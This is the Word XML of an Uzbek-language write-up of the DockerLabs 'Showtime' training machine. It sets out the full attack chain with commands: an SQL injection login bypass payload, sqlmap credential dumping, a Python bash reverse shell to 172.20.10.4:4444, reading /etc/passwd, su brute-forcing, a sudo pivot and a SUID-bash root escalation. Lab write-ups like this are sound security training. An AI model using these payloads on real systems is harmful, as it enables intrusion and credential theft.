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48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">"SHOWTIME" MASHINASI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">DockerLabs — Penetration Testing Hisoboti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="777777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sana: 2026-yil 16-iyul</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="777777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Maqsad IP: 172.17.0.2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1. Kirish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ushbu hisobot DockerLabs platformasidagi "Showtime" nomli mashinani yechish jarayonini sodda tilda tasvirlab beradi. Mashina bir nechta bosqichdan iborat: veb-ilovadagi SQL Injection zaifligi orqali autentifikatsiyani chetlab o'tish, ma'lumotlar bazasidan foydalanuvchi ma'lumotlarini olish, admin panel orqali reverse shell olish, tizimdagi maxfiy fayl yordamida parolni topish va sudo huquqlaridan foydalanib oxir-oqibat root huquqiga ega bo'lish.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. Dastlabki razvedka (Recon)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ishni maqsad tizimning ochiq portlarini aniqlashdan boshladik. Buning uchun nmap dasturi yordamida barcha portlar tekshirildi.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nmap 172.17.0.2 -p- --min-rate 5000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Natijada quyidagi ikkita port ochiq ekani aniqlandi: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22/tcp — ssh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80/tcp — http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80-port ochiq bo'lgani uchun keyingi qadam sifatida brauzerda veb-sayt ochib ko'rildi va Burp Suite orqali so'rovlar tahlil qilindi (login sahifasiga yuborilgan GET so'rovi va PHPSESSID cookie ko'rinib turibdi).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</w:rPr>
        <w:t xml:space="preserve">3. Veb-ilovani tekshirish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sayt kazino mavzusidagi bir sahifali ilova bo'lib, yuqori burchakda "Login" tugmasi mavjud edi.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Login tugmasi bosilganda "Usuario" (login) va "Contraseña" (parol) maydonlaridan iborat oddiy kirish formasi ochildi.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</w:rPr>
        <w:t xml:space="preserve">4. SQL Injection orqali autentifikatsiyani chetlab o'tish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Login formasi SQL so'rovlarga nisbatan himoyalanmagan bo'lib chiqdi. "Usuario" maydoniga klassik SQL Injection payload kiritildi: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admin'OR 1=1;-- -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Natijada tizim so'rovni to'g'ri tekshirmasdan, parolni hisobga olmay, foydalanuvchini tizimga kiritib yubordi — bu klassik autentifikatsiyani chetlab o'tish (auth bypass) holati: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</w:rPr>
        <w:t xml:space="preserve">5. sqlmap orqali ma'lumotlar bazasidan ma'lumot olish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection zaifligi tasdiqlangandan so'ng, Burp Suite orqali ushlab qolingan login so'rovi exploit.txt faylga saqlandi va sqlmap dasturiga uzatildi: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sqlmap -r exploit.txt -D users -T usuarios -C "username,password" --dump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sqlmap orqa fondagi DBMS MySQL ekanini aniqladi va "users" bazasidagi "usuarios" jadvalidan foydalanuvchi nomi va parollarni chiqarib oldi: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lucas — 123321123321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santiago — 123456123456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joe — MiClaveEsInhackeable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Diqqat: joe uchun bazadan chiqqan parol "MiClaveEsInhackeable" ("mening parolim buzib bo'lmaydigan" degani) aslida chalg'ituvchi (red herring) bo'lib chiqdi — bu parol veb-sayt orqali kirishga ishlatilgan, biroq keyinchalik tizimdagi haqiqiy "joe" foydalanuvchisi (Linux user) uchun boshqa parol talab qilindi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6. Admin panel orqali reverse shell olish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Topilgan "joe" hisobi bilan veb-saytga qayta kirildi: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Kirishdan so'ng "Panel de Administración" (Boshqaruv paneli) ochildi. Bu panelda Python buyruqlarini bevosita serverda ishga tushirish imkoniyati bor edi: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Shu maydonga reverse shell ochadigan Python kodi kiritildi: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import os;os.system('bash -c "bash -i &gt;&amp; /dev/tcp/172.20.10.4/4444 0&gt;&amp;1"')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Kod ishga tushirilishidan oldin, hujum qiluvchi tomonda (kali) netcat orqali 4444-portda tinglovchi ishga tushirildi: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nc -lvnp 4444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"Ejecutar Comando" tugmasi bosilgach, server tomon ulanish o'rnatildi va www-data foydalanuvchisi nomidan shell qo'lga kiritildi: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</w:rPr>
        <w:t xml:space="preserve">7. Tizimni ichkaridan tekshirish (Enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">www-data huquqi bilan tizimdagi foydalanuvchilar ro'yxati ko'rib chiqildi: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cat /etc/passwd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Fayldan uchta muhim foydalanuvchi aniqlandi: joe, mysql va luciano. Keyin /tmp katalogidagi fayllar ko'rildi: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/tmp ichida .hidden_text.txt nomli yashirin fayl topildi. Uni ochib ko'rganda, u "Martin"ga yozilgan xat bo'lib, unda GTA San Andreas o'yinining sevimli cheat-kodlari ro'yxati bor edi. Bu ro'yxat aslida keyingi bosqichda parolni topish uchun so'zlar lug'ati (wordlist) sifatida ishlatilishi kerakligiga ishora edi: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</w:rPr>
        <w:t xml:space="preserve">8. "joe" foydalanuvchisining tizim parolini topish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GTA cheat-kodlari ro'yxati asosida wordlist tayyorlandi. Ushbu lug'at yordamida joe foydalanuvchisining Linux (su) parolini topish uchun GitHub'dan tayyor bruteforce skripti qidirib topildi — Maalfer/Sudo_BruteForce loyihasi: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Skript (Linux-Su-Force.sh) wget yordamida yuklab olindi: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wget https://github.com/Maalfer/Sudo_BruteForce/blob/main/Linux-Su-Force.sh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Keyin skript joe foydalanuvchisi va tayyorlangan wordlist.txt fayli bilan ishga tushirildi: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bash Linux-Su-Force.sh joe wordlist.txt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Bir necha daqiqadan so'ng skript joe uchun to'g'ri parolni topdi: chittychittybangbang.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Topilgan parol yordamida su buyrug'i orqali joe foydalanuvchisiga o'tildi va bu tasdiqlandi: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</w:rPr>
        <w:t xml:space="preserve">9. Sudo huquqlaridan foydalanib "luciano" foydalanuvchisiga o'tish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">joe foydalanuvchisi nomidan sudo huquqlari tekshirildi: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sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Natijada joe foydalanuvchisi parolsiz (NOPASSWD) luciano nomidan /bin/posh dasturini ishga tushira olishi aniqlandi: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Shu huquqdan foydalanib, luciano nomidan posh ishga tushirildi va shu tarzda luciano foydalanuvchisiga o'tildi. Undan so'ng luciano nomidan ham sudo -l orqali huquqlar tekshirildi — luciano root nomidan /home/luciano/script.sh skriptini parolsiz ishga tushira olar edi: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</w:rPr>
        <w:t xml:space="preserve">10. Root huquqini qo'lga kiritish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avval script.sh faylining tarkibi ko'rib chiqildi — u belgilangan IP va portga (192.168.1.100:4444) reverse shell yuboradigan oddiy bash skripti edi. luciano ushbu faylni yozish huquqiga ega bo'lgani uchun, skript tarkibi to'liq almashtirildi va o'rniga /bin/bash fayliga SUID bitini qo'yadigan buyruq yozildi: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echo "chmod u+s /bin/bash" &gt;script.sh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Shundan so'ng skript root huquqi bilan (sudo orqali) ishga tushirildi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0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sudo -u root /bin/bash /home/luciano/script.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Buyruq bajarilgandan so'ng /bin/bash fayliga SUID biti qo'yilgani tekshirildi (-rwsr-xr-x), so'ngra bash -p buyrug'i orqali shu huquq bilan yangi shell ochildi. whoami buyrug'i root ekanini tasdiqladi — bu bilan tizimda to'liq root huquqiga erishildi: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</w:rPr>
        <w:t xml:space="preserve">11. Qo'shimcha: sqlmap uchun ishlatilgan so'rov fayli</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yakunda, sqlmap bosqichida ishlatilgan exploit.txt fayli tarkibi ham ko'rsatilgan — bu Burp orqali ushlangan va sqlmap'ga uzatilgan xom HTTP POST so'rovi edi (/login_page/auth.php manziliga yuborilgan usuario va contraseña parametrlari bilan):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</w:rPr>
        <w:t xml:space="preserve">Xulosa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Showtime" mashinasi bir nechta zaifliklarni ketma-ket zanjir sifatida bog'lashni talab qildi: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formasidagi SQL Injection zaifligi orqali autentifikatsiyani chetlab o'tish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sqlmap yordamida ma'lumotlar bazasidan foydalanuvchi login/parollarini chiqarib olish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panelidagi cheklanmagan Python kod bajarish funksiyasi orqali reverse shell olish (RCE)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Tizimda qoldirilgan yashirin fayl (cheat-kodlar) orqali parol lug'ati tuzish va su parolini brute-force qilish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Sudo konfiguratsiyasidagi noto'g'ri sozlamalar orqali foydalanuvchidan foydalanuvchiga (joe → luciano) o'tish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Root nomidan ishlaydigan skriptga yozish huquqidan foydalanib, /bin/bash fayliga SUID o'rnatish va to'liq root huquqiga erishish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bu mashina veb-ilova xavfsizligi (SQLi, cheksiz kod bajarish), zaif parollar va noto'g'ri sudo/skript huquqlari kabi bir nechta real hayotdagi keng tarqalgan xatolarni birlashtirgan yaxshi o'quv mashinasi hisoblanadi.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dcaafe5706284b1b6016af0ba9f729af38049b.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/32e7ed73559a1f2824f9edadcf541d619c5eb3df.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/678cc2a3ac0dd09f0b9afe6c4cefe887ee83c79c.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/2e3fc04a9d4693468b947f2a6076fa91394336b5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f5104f4ad58d84c7b8e0f28c9b1978cdd5febbd3.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/bb56135a6596422f419658c9ef0c4a3404fbf9ec.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/440d74f62bf1980dbcc2dac43c73a7e2a37f49a2.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e12c0517754fdb770af512f287e92b3b7dfe6774.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/71e01df013ca61907e3031c7680d221efc4b2760.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b54a568fb3297aff6d8d4d59ce978ee97e5a0923.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/67b7b8c275efe88995a6e94f9386cca974ec5f2a.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f630c692f26306b1ab171a5acdb2e5e80859b7a7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8e80168e7fe692e3fcdb2714765cd536f53f3f61.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6078eb9da7453032497528f6ad26b822493309ac.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6396526e955da1f4cc06c378fc907b1a4f98205e.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/555e2f0b1148d1f5add46f5c3eb49a2ce7aaf48d.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/bedcdaa56b5f62d4f31dea53421fadf31088582a.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6f09956ef9c0a4b994eda5c90bb9aded721e24b1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cc612c8f77ee7a52400592df75f2fc47a6c34880.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5f0304463c4514ef83af8b603daa63f24890e4e8.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1c3e2f3cdd31607ffadde837e671633369f2af7c.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8a08f7564565806ee159ada65368f61266f520e6.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e99b0d3c5a34d6c7a3d0beac1730203a8f06b8d7.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a253f99bd99ada5b6638e43b687f74033371c71d.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d46ec4fe9f4663c90419021bdda17529823003bc.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7203cf99f4fb6fd3df6375e732a60e036f8ab244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2026-07-16T08:10:18.326Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-16T08:10:18.344Z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